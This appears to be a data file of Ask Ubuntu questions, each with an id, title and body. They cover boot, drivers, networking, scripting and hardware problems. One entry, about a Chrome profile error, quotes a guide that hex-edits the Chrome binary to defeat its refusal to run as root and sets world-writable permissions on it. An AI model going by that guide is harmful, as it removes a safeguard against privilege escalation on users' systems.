298882	lubuntu minimize all show desktop keyboard shortcut ?	is there a show desktop ( also known as minimize all ) keyboard command in lubuntu ? i looked around in lubuntu-rc.xml , but i did n't have any luck . if there is one , and it 's a super key , then is there a way to change it ? i 'm using a model m keyboard , which is pre-super key .
298886	gnome does not enforce password complexity in 12.04	i 'm lost on this : i have password complexity configured in /etc/pam.d/common-password and /etc/pam.d/common-auth . while logged in as a regular user i can reset a password from a terminal window and it forces me to use the complexity requirements set in pam . however , i purposely expired a user 's account with the command : sudo chage -d 0 useracct to verify they would be prompted to reset . then , as that user , i tried logging in and was prompted to change the password in the gnome user account list , however , i purposely typed a simple password , in fact i used the same weak password the user originally had and it took it . it accepted the old weak password which means it is not enforcing password complexity from this interface , and i have no way of knowing whether this is a gnome problem or some pam module configured wrongly . thanks . update ( adding contents of common-password and common-auth ) this is what i have configured in common-auth : auth required pam_tally.so deny=3 unlock_time=3600 auth [ success=1 default=ignore ] pam_unix.so nullok_secure auth requisite pam_deny.so auth required pam_permit.so this is what i have configured in common-password ) password requisite pam_cracklib.so retry=3 minlen=14 difok=3 ucredit=-1 lcredit=-1 dcredit=-1 ocredit=-1 password [ success=1 default=ignore ] pam_unix.so obscure use_authtok try_first_pass sha512 remember=24 password requisite pam_deny.so password required pam_permit.so password optional pam_gnome_keyring.so
298888	ubuntu touch on galaxy s wifi 4.2 tablet	can i install ubuntu touch on galaxy s wifi 4.2 tablet ? do i have to root it before ? anyone have tried ?
298889	the sources of the zend framework package	where can i find sources that were used to build zend-framework deb package ( s ) ? for most pachages there is a .debian.tar.gz available , but not in this case . where could i find it ?
298893	how do i submit a new package to universe ?	i 've built a package and it is in my ppa here https : //launchpad.net/~evarlast/+archive/ppa i searched a little and found this https : //wiki.ubuntu.com/motu/gettingstarted but i could not find a simple howto guide on how to get this into universe .
298896	how to uninstall valley ?	so i installed this app with .run file . valley but now i do not want it any more so how do i get rid of it ? ? there is a folder in home directory , should i just delete it ? ? thank you in advanced
298898	screen brightness and touchpad issues on dell xps13 - ubuntu 12.04 lts	last week i bought the dell xps 13 ( l322x ) ultrabook only for ubuntu . to make sure that i will not have any issues i installed the 12.04 lts version instead the sputnik image . in ubuntu forums , some people said that this version ( 12.04 lts ) had all the sputnik features ( drivers ... ) . everything´s fine , i´m pretty satisfied and ubuntu works almost ¨out the box¨ except for some issues : i can´t adjust the screen brightness with the function keys ( fn + f4/f5 ) . actually the both keys works fine . the brightness bar appears at the left top side of the desktop , but the screen don´t respond the commands ... i can´t adjust the touchpad speed and sensitivity . the pointer speed it´s at the max , but still too slow ... sorry about my english , i´m from brazil and i´m kind rusty with the language .
298900	unity display glitches in ubuntu 13.04	i 'll just be using unity , but every time i try to shut down , open the shortcuts guide , or open the dash , i 'm getting glitches . here are some screenshots : http : //postimg.org/image/equ6m7xzd/ http : //postimg.org/image/nadkjz6bt/ the suspend and logout menus do the same thing as the shutdown one . sometimes i can barely read them , depending on the wallpaper ( it changes automatically . the dash does kind of the same thing , but much less noticeable . it appears that the correct blurring and dimming/coloring only happens in that small square in the corner . the glitches are pretty annoying . please help ! i 'm running on a dell inspiron 6000 with a intel速 915gm x86/mmx/sse2 graphics card . thanks !
298906	ubuntu dependency problems after `do-release-upgrade`	i recently performed do-release-upgrade , and it appears to have broken some of my packages . i ca n't properly apt-get autoremove or apt-get upgrade any more . $ sudo apt-get install -f ... errors were encountered while processing : initscripts netbase ntpdate procps udev dmsetup libdevmapper1.02.1 dbus consolekit eject rsyslog ifupdown computer-janitor grub-common grub2-common grub-pc-bin grub-pc policykit-1 grub-gfxpayload-lists e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04 lts '' what would you recommend to fix this ?
298907	error launching software management and updating	am running ubuntu 12.04 , tried installing virtualbox but ran into the following error . e : malformed line 1 in source list /etc/apt/sources.list.d/virtualbox.list ( dist parse ) e : the list of sources could not be read . now when i try to update through the terminal i receive the same error . furthermore , when i try to run ubuntu software centre it closes almost immediately . so my guess is that i can use gedit to change the virtualbox.list and that should resolve the problem , but i do n't know what to change the virtualbox.list to . any help would be appreciated , thanks for your time .
298913	windows xp & ubuntu 12.10 shutdown problem	ubuntu 12.10 for some time has not been shutting down at all . it is showing some series of numbers and call trace message ( i do n't know anything about this ) . it did not shut down even after waiting for half an hour . i just turned the power off to shut it down . can i have any solution for this ?
298918	configure `` link-local only '' without networkmanager ?	i have two computers , each of which i want to connect to a camera that communicates via `` link-local '' ethernet . the first computer has a full install of 12.10 . i can get the camera communicating by going to networkmanager - > edit connections - > edit ... - > ipv4 settings - > method - > link-local only . visually this looks like : this works great . however , the second computer is an install of 12.10-minimal and does not have the network manager or a gui . to configure it manually via the command line i have tried this : ifconfig eth0 169.254.7.43 broadcast 169.254.255.255 netmask 255.255.0.0 which is identical to the ifconfig produced on the first computer . however , the camera is not recognized . the big question : how do i configure my ethernet port like network manager 's `` link-local only '' without network manager ?
298921	ca n't seem to get script/cron job to work ?	ive written a ffmpeg script to mass convert mkv into mp4 . when i run the script as my user , and enter my password for sudo privileges it works very well from the command line . the script is : # ! /bin/bash for inf in *.mkv do sudo ffmpeg -i `` $ inf '' -vcodec copy -acodec ac3 `` $ { inf % . * } .mp4 '' done very simple and works . however , when i run it as a cron job ( setup through webmin ) as root it runs ffmpeg but then says : ffmpeg version git-2013-05-14-56ba331 copyright ( c ) 2000-2013 the ffmpeg developers built on may 13 2013 23:50:16 with gcc 4.6 ( ubuntu/linaro 4.6.3-1ubuntu5 ) configuration : -- enable-gpl -- enable-libass -- enable-libfaac -- enable-libfdk-aac -- enable-libmp3lame -- enable-libopencore-amrnb -- enable-libopencore-amrwb -- enable-libspeex -- enable-librtmp -- enable-libtheora -- enable-libvorbis -- enable-libx264 -- enable-nonfree -- enable-version3 libavutil 52 . 31.100 / 52 . 31.100 libavcodec 55 . 9.100 / 55 . 9.100 libavformat 55 . 7.100 / 55 . 7.100 libavdevice 55 . 0.100 / 55 . 0.100 libavfilter 3 . 65.100 / 3 . 65.100 libswscale 2 . 3.100 / 2 . 3.100 libswresample 0 . 17.102 / 0 . 17.102 libpostproc 52 . 3.100 / 52 . 3.100 *.mkv : no such file or directory for some reason it seems like it cant access the mkv files or inf doesnt work with cron jobs ? i dont know . any push in the right direction would be very helpful . edit : when i run this the script ( test.sh ) is in a certain dir ( /mnt/sdb1/temp ) do i need to have that in the script ? would it be giving me that error because its running it somewhere else that actually doenst have mkv files ?
298923	how to dual boot ubuntu 13.04 with windows 8 on lenovo y500 using easybcd ?	i 'm trying to install ubuntu on a lenovo y500 . i have disabled uefi and secure boot , and reinstalled windows . i booted from a usb key with ubuntu 13.04 64 bit , and installed it with the bootloader installed on the '/ ' root partition . when i add ubuntu to the windows boot manager using easybcd with grub2 i get an error about not finding ubuntu , and when i use syslinux i get a black screen . i want to use windows to manage the boot process , so please no solutions using ubuntu as the initial bootloader .
298931	youtube videos are slow ?	i am running ubuntu 12.04 i have tried reading different articles online but i am beat . i check my internet speeds they are running at the correct speeds . yet when on youtube videos just take ages to get working . i for the most part us chromium , although i tried to use firefox to see if this was browser specific and it was not . i get very low loading time for youtube . i have streamed from other pages with ease . i tried in creasing cache , updating flash , playing under html5 . ( i have 12mb/down speed internet , when i ran videos on win7 never had an issue my internet could handle 720p ) anybody have a solution ?
298938	ubuntu 12.04 ping 8.8.8.8 does not work on one network only	i 'm using ubuntu 12.04 . i can connect to and use the internet on one wireless network ( say a ) and not on the other network ( say b ) . i can connect to b and get an ip address . when i ping 127.0.0.1 it works when i ping 192.168.1.1 it also works but when i ping 8.8.8.8 i get destination host unreachable . i tried commenting out dns=dnsmasq in /etc/networkmanager/networkmanager.conf but that did n't work and then restarting the network manager . i also tried to flush the cache using ip route flush cache but that also did not work . any help would be appreciated . thanks
298944	my ubuntu live cd will only connect to my wired internet on one computer	i recently burned the ubuntu 12.4.2 live cd , and put it in my lenovo n580 notebook to install ubuntu to my 32 gb sandisk flash drive . it completed successfully , but after booting from my flash drive my computer would not connect to the internet via ethernet , or even recognize a physical conection . the computer 's main operating system is windows 8 , and it will connect to my ethernet just fine . an idea occured to me , so i tried it . i put my live cd into my sony vaio vpcee41fx and booted from the live cd successfully , but on that computer it would connect to my ethernet . i cleared ubuntu off of my flash drive and thought about installing it on the vaio since it could connect to the internet with my ethernet . if i did this , would that make the copy of the os on my flash drive be able to connect to my home internet through ethernet on my lenovo notebook ? this is really frustrating , and is causing me a lot of greif . if anyone has had a similar isue and solved it , or if anyone knows how to help me , i 'd really appreciate it .
298947	apply a visual sharpeness filter to entire desktop ?	is there any way to apply a sharpen effect to my desktop for all applications ? this overlay would sharpen all text and images ( everything ) and constantly be on in real time . it can be likened to applying the photoshop/gimp sharpen effect , but in real time as an overlay to your entire desktop for any and all applications . fyi with all due respect , i already know about cleartype , bright/contrast adjust , monitor osd menu sharpness setting , powerstrip , softmccs . none of these are the solution i seek . thank you !
298949	what is telepathy in ubuntu ? what is the relation of telepathy and empathy ?	i have tried to clean up unused packages/software and i tried to remove telepathy but it also affects the empathy package which i use . that makes me wonder why empathy depends on telepathy and what does telepathy do . could anyone or someone explain me this .
298951	system periodically stalls for less then 1s then resumes normally	periodically my system stalls for a short while ( less then 1s ) . when it occurs , the mouse pointer hangs or stutters and my keyboard input does n't show up on the screen . after it 's done , the keyboard input appears instantly and my mouse jumps to the point where it should be . i 'm running ubuntu 13.04 on a macbook air . i turned the swappiness down to 10 , also looked at vmstat ( to check if it 's swapping ) and looked at dmesg and syslog , aswell as top . i ca n't find any aberrant behavior , there are no logmessages and no swapping . my system is entirely up-to-date . $ uname -a linux wega 3.8.0-21-generic # 32-ubuntu smp tue may 14 22:16:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux the following output was captured with iostat -xm 1 at the time of one of the stalls : avg-cpu : % user % nice % system % iowait % steal % idle 10,08 0,00 3,27 0,25 0,00 86,40 device : rrqm/s wrqm/s r/s w/s rmb/s wmb/s avgrq-sz avgqu-sz await r_await w_await svctm % util sda 0,00 13,00 0,00 2,00 0,00 0,06 60,00 0,01 4,00 0,00 4,00 4,00 0,80 dm-0 0,00 0,00 0,00 0,00 0,00 0,00 0,00 0,00 0,00 0,00 0,00 0,00 0,00 there is some io , but i 'm not entirely convinced that this is the problem , especially since it 's just a couple of write reqs . when i run bonnie++ it gets good results on writes , and the frequency of the stalls does n't appear to increase . i ran bonnie++ before on /tmp which performed very well , now i 'm running it on my encrypted homedir and it 's not doing so goed at all , it 's running at 99 % cpu usage , but with almost 0 disk util ( as shown by iostat ) .
298953	application crashes from command line but runs fine from unity	general question : how can i most closely mimic via the terminal the way in which unity executes a program ? hi i 'm able to successfully run pidgin ( 2.10.3 ) from the unity interface ( ubuntu 12.04 lts ) , but when i simply run 'pidgin ' from the command line i receive a segfault . ideally , i would like to run 'pidgin ' from the command line with the '-d ' ( debug ) flag to see debug output . i thought perhaps unity was using some special flags , etc . but the standard /usr/share/applications/pidgin.desktop file simply says : [ desktop entry ] name=pidgin internet messenger genericname=internet messenger comment=chat over im . supports aim , google talk , jabber/xmpp , msn , yahoo and more exec=pidgin icon=pidgin startupnotify=true terminal=false type=application categories=network ; instantmessaging ; x-ubuntu-gettext-domain=pidgin segfault text : ** ( pidgin:12897 ) : warning ** : could not connect : connection refused ( pidgin:12897 ) : libdbusmenu-glib-warning ** : unable to get session bus : could not connect : connection refused ( pidgin:12897 ) : libnotify-warning ** : failed to connect to proxy ( pidgin:12897 ) : libindicate-error ** : unable to get session bus : could not connect : connection refused trace/breakpoint trap ( core dumped )
298958	middleclick leads to page back in firefox	when i middleclick , on a link , it opens it in a new tab , which is the wanted behavior . but sometimes , i miss the link by a few dots which leads in firefox going a page back . in windows that behavior does not occur . how can i change this , so nothing happens , when middleclicking anywhere except of links ?
298963	how to capture code : :blocks screenshot	i 'm trying to make some notes of code : :blocks with wxwidgets . i have a wxchoice box on the screen . with the list collapsed ( i.e. , unexpanded ) i can get a screenshot of the form . however , with it expanded ( i.e. , when i click on the choice box and the list is seen ) the screenshot does not work . i tried alt+printscreen as well as just printscreen alone . nothing works . is this a restriction or is there a way around this ? my platform : ubuntu 12.04 , code : :blocks 10.05 thanks ! here 's the screenshot without the choices expanded ( the form is totally meaningless - it 's only for proof of concept ) .
298964	set text direction in gnome-shell ?	how can i change the text direction in gnome-shell back and forth between right-to-left and left-to-right ? ( mine is in left-to-right . i have tried changing the language to chinese ( using the `` region and language '' settings widget ) which i believe does right-to-left . upon logging out and back in , the shell still appeared left to right . do i need to do something else like set a keyboard layout to cause rtl ? ? ) .
298969	my harddisk is facing problems	how do i image the disk and copy it to new disk to avoid reinstalling ubuntu and windows 8 . are there any special steps ; since i am dealing with a dual boot windows 8 and i am replacing one of two hard drives ? how do i fix corrupt partition tables and mbr code . in amd-64 assembly language with comments what should this code read so i can do a compare ? i know every hard drive has proprietary firmware on it . but if i can learn to fix this kind of hard drive problem it would interesting . most hard drives are reported as failures after multiple repartitions and mbr becomes corrupt without actual hardware part failure . i do n't want to spend the money on shipping a hard drive if can learn to fix the problem .
298970	how to prevent users from reading files but the webserver should still be able to read	i have a lighttpd test server on my testing machine with 2 users they all have there own folder with a public folder for the webserver in it , now i want to prevent that the other user can read the stuff of the other user , but the webserver should still have access . how do i do that ?
298971	full switch locale : ubuntu server installed with no locales , how to enable locales systemwide ?	i have a server with no x , installed with no locales . there is a `` c '' locale . i need to : run server scripts ( no console involved ) to copy , move and gzip files towards local ext4 file-system , which should contain files with special encoding ( czech , korean , russian etc . ) , so the utf-8 should be enabled . see the file-names when i type commands in the console have possibility to type most of the file-names with special letters , when logged trough ssh . what should i do to reach that state ? goal is to give complete guide to change locale systemwide ( as default ) .
298977	ubuntu 12.04.2 - oem installation - uefi mode	i want to install ubuntu 12.04 in a laptop with a windows 8 preinstallation in uefi mode . i followed the instructions here and i use a 64bit iso of 12.04.2 . when i boot from usb ( in uefi mode ) the oem installation is not availble ( there are only 3 options : `` try ubuntu , install ubuntu and check disk '' , while if i boot the same iso in legacy mode the oem installation is availble through the f4 options . also note that the 13.04 has availble the oem installation from booting in uefi mode . it is important to install the lts version because we prepare an image for use in > 500 laptops and also we can not ignore the uefi mode because we must have the dual boot with the existing windows 8 preinstallation .
298982	which ubuntu i should install ?	my hardware is : celeron 2.80gh 1 gb ram 250 gb hdd though which ubuntu version should i install in order to get a maximum fast performance from my pc , as when it ( pc ) was new ? please , suggest me the version which will not freeze my computer . tried to install linux mint , ubuntu , but they 're freezing or slowing my pc down .
298989	questions about my wifi card	i wanted to find out my wifi card as i did a fresh ubuntu installation . i do n't think ubuntu by default installed the correct drivers . so i typed in terminal : sudo lshw -c network and this was the result : *-network description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory:56400000-56403fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 02 serial : 88 : ae:1d : d1:71 : eb size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory:52410000-52410fff memory:52400000-5240ffff memory:52420000-5243ffff *-network disabled description : wireless interface physical id : 3 logical name : wlan0 serial : 00:26:82 : cd : cc:39 capabilities : ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.8.0-19-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn now my question is how to install proper drivers for the card ? if proper drivers are installed how to find out ? thirdly i want to know if my card supports monitoring mode , promiscuous mode . will it work with aircrack-ng ? i am asking this because aircrack-ng does not have a list of supported cards .
298992	where can i look for malware that may have been installed on my machine ?	i want to analyze my ubuntu box to detect if it was been hacked . my question is : what are all the place where to look to discover if some malicious software are started ? the following is some kind of raw list : mbr kernel image ( i have md5 ) /sbin/init ( i have md5 ) kernel modules in /etc/modules all the services script in /etc/init.d and /etc/init ( i have md5 ) /etc/rc.local gnome autorun and ? my question is totally honest and not malicious . it 's only to detect if my box was been compromised .
298996	formatting external hard drives	is there any way i can re-format my external hard drive to accept larger data files without erasing the current stored data on the drive ? ?
299018	using multiple internet connections on ubuntu	my network topology is as follows : pc ( 1 nic ) ====== > switch ======= > 2 routers ( 192.168.1.1 and 192.168.1.11 ) . the pc has only 1 nic ( ethernet port ) . both routers connected to their respective isps . need a quick and simple way to make ubuntu use both the broadband connections . please dont point me to bonding ( https : //help.ubuntu.com/community/ubuntubonding ) that is a different thing , bonding combines 2 nics into 1 . i need to use 2 routers at the same time ( like having 2 gateways at the same time )
299019	how can i boot my system	i have to two operating systems in my computer , ubuntu and xp . when i try to boot up ubuntu , i get the following message : mount : mounting/dev on/root/dev failed : no such file or directory mount : mounting/sys on/root/sys failed : no such file or directory mount : mounting/proc on/root/proc failed : no such file or directory target file system does n't have/sbin/init noinit found.try passing init=bootarg . busy boxv1.13.3 ( ubuntu 1.1.13.3-1ubuntu11 ) built-in shell ( ash ) enter'help'for alist of built-in commands . ( initramfs ) what can i do to boot up ubuntu ?
299021	macbook retina running ubuntu 13.04 problem	i install ubuntu 13.04 using refind . it works ok , but when i close the notebook , it shuts down . does anybody have any solution to this ? thanks
299024	do i need any drivers for a thinkpad l410 laptop ?	i am interested in using ubuntu os on my 'thinkpadl410 ' laptop but when i searched for the required drivers in the lenovo website i did n't find any for ubuntu . can anybody tell me where can i find the required drivers , or tell me if i can not install ubuntu at all on it .
299026	amount of data written on a partition	is there any way to find out how much data have been written on the partition since it was created ? talking about ext4 fs .
299027	setting up ubuntu web server ?	i 've just purchased a cloud vps and installed ubuntu server 13.04 on it and that is pretty much all of my linux knowledge . can someone point me to the best up to date tutorial on setting up ubuntu web server ? i need the standard stuff : lamp ftp server mail server dns server to point my domain to it . most of what i found were tutorials on setting up server on pc which is rather different then setting up server for productive purposes . also i 'm paranoid that things might go south , can you tell me what is the routine of managing the server and more or less will i need to manage it at all after the setup ? thank you in advance . edit : i 've found exactly what i was looking for , a perfect solution for all the starters out there who wonder how the hell can a normal person memorize all this linux commands : ) here you go : http : //www.howtoforge.com/perfect-server-ubuntu-13.04-apache2-bind-dovecot-ispconfig-3
299028	ubuntu 12.04 routing question	i have got a little network problem : samsung 350 v5c laptop.ubuntu 12.04 the problem is that if i use the wifi connection , because that is my internet connection at the moment , and if i want to use same time my lan connection too , there is no internet . so if i plug to another one router to the lan interface no internet , if i unplug the router there is internet . how should configure my network that working wlan and ethernet same time ?
299046	antivirus worries	i 've just installed ubuntu on my laptop to run alongside windows seven and was wondering about anti virus , malware etc . question , do i need to install separate anti-virus / malware for ubuntu or will my current one cover both
299048	how to open on single mouse click	somehow i changed the setting from the default double click to single click which makes the right click open the file when i want the right click menu . so i need to know where i did it so i can reverse it . i 've spent the whole night trying to remember how i did it , please help , thanks the setting altered both sides , solved thanks guys !
299052	how to execute sh script from a desktop shortcut ?	im trying to make a shortcut to login my ssh server : ssh x.x.x.x i made the following file : ssh_home.sh made it executable : sudo chmod +x ./ssh_home checked by right clicking properties to check if it was executable and it was.. but whatever i do , when double clicking it , it will launch gedit . i tried `` open with '' but no terminal app is shown there . i searched the net but only found a way to link to the file while not integrating it in one `` shortcut file ''
299054	lenovo workstation and ubuntu	i would like to know if the lenovo workstation are certified with the ubuntu distribution version 12.04 lts .
299058	is there a default limit to the amount of memory a process may use ?	running 64-bit matlab 7.12 on a 64-bit 10.04 ubuntu server . when i try run a big problem that should need 46gb of memory ( the server has 72gb of memory and plenty of swap space ) , the experimental script is killed by the os ( see dmesg below ) . dmesg returns after the job is killed : [ 26687918.130102 ] out of memory : kill process 2630 ( bash ) score 4999042 or a child [ 26687918.130103 ] killed process 2774 ( matlab ) so my question is : is there a default per process memory limit in ubuntu server 10.04 , and if so , can it be modified ? thanks , gordon
299063	unable to upload new header image	i am trying to upload header image but i am getting following error . unable to create directory /srv/www/wp-uploads/localhost/2013/05 . is its parent directory writable by the server ? but i my wordpress is installed in var/www folder . i reinstalled wordpress for the same issue .
299064	how to use kde or gnome hardware/network detection in another desktop environment ?	i like to run light window managers , like fluxbox , not for performance just because i find them simpler to configure and they fit better my working style . but having automatic hardware and network detection is also very convenient . is there any way i can have that same gnome or kde functionality without having to use the whole environment itself ?
299065	gnome shell and unity dont show up at the login screen	i am running kubuntu 13.04 and installed xfce desktop environment in it . from the ubuntu software center i tried to install gnome shell and unity . but when i logout i cant login to those . they both dont show up in the login screen . so i tried to install gnome using apt-get and it says that the latest version is installed . so how do i login to gnome and unity ?
299068	unity mail sound notification not playing after re-installing ubuntu 13.04	it was working great just a couple of days ago on a previous install , also 13.04 . everything is the same , not sure why it is n't working . under options , `` play sound on message receive '' is switched on i 've re-installed it a couple of times and still , no pop
299074	python unity indicator applet and glade child window exits at the same time	since i do n't have much reputation . the original question has been posted in stackoverflow and here is the link : python unity indicator applet and glade child window i have created an unity indicator applet with python and glade . here is the screenshot that appears when indicator applet is clicked . you can see the preferences menu . when this preferences menu is clicked , it opens a new window . indicator applet menu preference window now the problem is when i click on close button , the whole application exists . the code that triggers the preference window is as shown below : def action_preferences ( self , widget ) : ' '' show the preferences window ' '' base = preferencewindow ( ) base.main ( ) self.menu_setup ( ) preference.py has the following code : import sys import json import pynotify try : import pygtk pygtk.require ( `` 2.0 '' ) except : pass try : import gtk import gtk.glade except : print ( `` gtk is not available '' ) sys.exit ( 1 ) class preferencewindow : ui = none configs = { } notify = none window = none def __init__ ( self ) : if not pynotify.init ( `` nepal-loadshedding '' ) : sys.exit ( 1 ) self.ui = gtk.glade.xml ( `` pref_ui.glade '' ) # get the preference saved previously self.configs = self.parse_configs ( ) saved_group_value = str ( self.configs.get ( `` group '' ) ) self.ui.get_widget ( `` text_group_number '' ) .set_text ( saved_group_value ) dic = { `` on_btn_pref_ok_clicked '' : self.on_save_preference , `` on_btn_pref_close_clicked '' : self.on_close , `` on_preference_window_destroy '' : self.on_quit , } self.ui.signal_autoconnect ( dic ) if self.window is none : self.window = self.main ( ) def parse_configs ( self ) : self.configs = json.load ( open ( `` config.txt '' ) ) return self.configs def save_configs ( self , key , value ) : self.configs [ key ] = int ( value ) json.dump ( self.configs , open ( `` config.txt '' , `` wb '' ) ) return true def on_save_preference ( self , widget ) : group_number = self.ui.get_widget ( `` text_group_number '' ) .get_text ( ) self.save_configs ( `` group '' , group_number ) # try the icon-summary case if self.notify == none : self.notify = pynotify.notification ( `` nepal loadshedding '' , `` group saved successfully to : `` + group_number ) else : self.notify.update ( `` nepal loadshedding '' , `` group saved successfully to : `` + group_number ) self.notify.set_timeout ( 100 ) self.notify.show ( ) print `` saved successfully '' def on_close ( self , widget ) : print 'close event called' def on_quit ( self , widget ) : sys.exit ( 0 ) def main ( self ) : gtk.main ( )
299081	how do i create a backup image of an sd card ?	i am quite new to ubuntu and i have to copy my sd-card to my hard-drive i know that i have to mount and unmount it but i have the problem , that the following line doesnt work : dd if=/media/oneiric of=~/sd-card-copy.img that was my first try but then i found out , that i have to unmount my card and select the /dev/sdx the problem is that the commandline `` fdisk -l '' isnt showing anything . nothing happens and therefore i cant copy my files . was this unterstandable ? can someone help me ?
299083	how to backup and restore firefox bookmarks from command line ?	is there an easy way to backup firefox bookmarks to a file with command line . running a find command , i managed to find this file : /.mozilla/firefox/9a5j5dbb.default/bookmarkbackups/bookmarks-2013-05-22.json which appears to have my latest data . however , i dont know if the folder under firefox ( currently 9a5j5dbb.default ) will keep changing , and i 'm pretty sure the date will . rather than a more advanced shell script to dynamically calculate the path based on today 's date and looking for the only xxxxx.default folder under ~/.mozilla . is there a simpler/more-robust way to save/copy your current firefox bookmarks to a specified file ?
299086	add tags or annotations to text files	i have a lot of similar text files - data in csv format etc . - that differ only in minor aspects ( data normalized or not normalized ... ) . it is very difficult to find meaningful names for the different files that allow me to keep track of what i did within each of them . is there a way to add a comment or tags to these files in nautilus or with an additional program ? thank you !
299087	after login , unable to use mouse or keyboard	let me start off by saying i have tried several fresh installs of 13.04 and each time the mouse and keyboard can not function properly . i 'm able to move the mouse but can not click anything ; as for the keyboard i 'm unable to launch anything either . i then decided to reinstall 12.10 and everything worked fine so i upgraded to 13.04 which then yields the same issue , unable to click and use keyboard . not sure what to do here , do you have any ideas ?
299089	profile error when launching google chrome	whenever i launch google chrome , a window is displayed which contains this message : your profile could not be opened correctly . some features may be unavailable . please check that the profile exists and you have > permission to read and write its contents . at first i tried to remove ~/.configure/google-chrome folder , and restarted google chrome . it created a new google-chrome folder , but it does n't solve the problem . the same window is displayed again . how do i solve the problem ? the original atricle from chinese douban community google在linux环境下对chrome的使用做了限制，笔者猜测可能是基于安全的考虑，否则遇到配合xss的挂马以及诸如此类的问题的时候，就会以root权限执行命令，这是相当危险的。但是chrome的确是一款不错的浏览器，这样放弃实在舍不得。 于是： 首先需要安装十六进制编辑器 apt-get install hexedit 然后使用编辑器编辑chrome hexedit /opt/google/chrome/chrome 注意：路径如果不同的话请自行使用dpkg -c安装包来察看安装到哪里了。 进入到编辑器后，光标在左侧，首先按tab键切换到右侧的ascii码模式，接着按ctrl+s打开搜索功能，输入geteuid查找，然后将geteuid改为getppid，最后按ctrl+x保存退出。 重新打开chrome，正常运行。 translated in english when you use google-chrome in linux , you will find that there is some limitations , probably the limitations are based on safety considerations . otherwise , if it is used in conjunction with xss and such kind of vulnerabilities , the hakcer is able to run command as root priviledge.this is very dangerous . but chrome is one of the greatest browsers.it 's unwisdom to abandon chrome for this reason . so , we will do something to let chrome be free from this limitations . 1.install the hexedit , open a terminal and run : sudo apt-get install hexedit 2.and then edit chrome wiht hexedit : sudo hexedit /opt/google/chrome/chrome tips : be sure you have the write privilege to chrome . if you do n't have this privileges , run : sudo chmod -r 777 /opt/google/chrome/chrome notice : if you have't install chrome in example directory , please run dpkg -c to find you r directory . enter the hexedit , the cursor is on the left . press the tab let the cursor go to right which was ascii model . press ctrl+s to open the search engine search `` geteuid '' replace `` geteuid '' with `` getppid '' press ctrl+x , save and exit . lanuch your chrome , it work properly . that'all
299099	recommendations for a network monitoring data counter ?	is there a graphical data counter for ubuntu that records how much uploaded/downloaded data was used and bandwidth being used and total amounts , filtering it by application ?
299101	java_home : .bashrc or .profile	i need to set some variables such as java_home and add them to the path . can i somehow define them in .profile , and have them pulled into .bashrc ? or maybe add them to a 3rd file , and have that file referenced in .bashrc and .profile ?
299104	os-prober does n't show my windows 7 partition	i 'm having a problem installing ubuntu 12.04 on my asus ux31a alongside windows 7 ; i tried to launch os-prober in my terminal and the only option i get is /dev/sda5 : windows recovery environment ( loader ) : windows1 : chain while windows 7 ( mounted on dev/sda3 ) is not showed . this is what i see in my disk manager inside windows 7 : ( sorry for the italian language , c : basically is the partition with windows system 's file , while the d : one is for data ) , while this is what i see when i launch gparted : may it be because windows is installed on ssd ? how do i know that ? is it safe if i proceed with the installation for computers with uefi , sdd and hdd ? i 'm not sure that 's my case .
299111	printing multiple pages per sheet does n't work	in ubuntu 12.04 , i added a network printer which i had previously used without any problems on a different machine ( with the same release of ubuntu ) . now , with the default generic driver installed , printing multiple pages per sheet from evince does n't work properly . if i select 2 per sheet , be it long or short edge , it always prints 4 . why is this ? it used to happen with non-pdf documents in the past , like from a browser . my workaround was to print to pdf file and then print the pdf itself . now i 'm clueless ... edit : the same happens with a different network printer , in which i installed the driver specific to its particular model .
299112	swift configuration throws error `` unable to create container '' when i click on dashboard to create container	swift configuration throws error `` unable to create container '' i get the below error when i try to test from swift proxy server account get failed : 503 internal server error ) i have 3 proxy nodes already setup . i am following the www.hastexo.com document any help would be appreciated ?
299113	internal webcam not recognised	i have a samsung series 7 chronos , model number np700z5c-so2ub , with ubuntu 13.04 , and the internal webcam does n't work . following advice for others who had similar problems i installed cheese , and started it from the terminal : $ cheese ** ( cheese:8891 ) : warning ** : cheese-main.vala:251 : error : no device found ( cheese:8891 ) : cheese-critical ** : cheese_camera_device_get_device_node : assertion `cheese_is_camera_device ( device ) ' failed ( cheese:8891 ) : glib-critical ** : g_variant_new_string : assertion `string ! = null ' failed ( cheese:8891 ) : glib-gio-critical ** : g_settings_schema_key_type_check : assertion `value ! = null ' failed ( cheese:8891 ) : glib-critical ** : g_variant_get_type_string : assertion `value ! = null ' failed ( cheese:8891 ) : glib-gio-critical ** : g_settings_set_value : key 'camera ' in 'org.gnome.cheese ' expects type 's ' , but a gvariant of type ' ( null ) ' was given ** ( cheese:8891 ) : critical ** : cheese_preferences_dialog_setup_resolutions_for_device : assertion `device ! = null ' failed cheese opens fine , it displays no warnings except in the terminal . i can ask it to take a picture and it appears to do so , but the pictures are just black images . as if i 've left the lens cap on ! i also tried : $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 003 : id 8087:07da intel corp . so there 's no sign that the system even knows i have a webcam . i never tried it in windows before i uninstalled it , so i do n't know if it 's ever worked . any suggestions ?
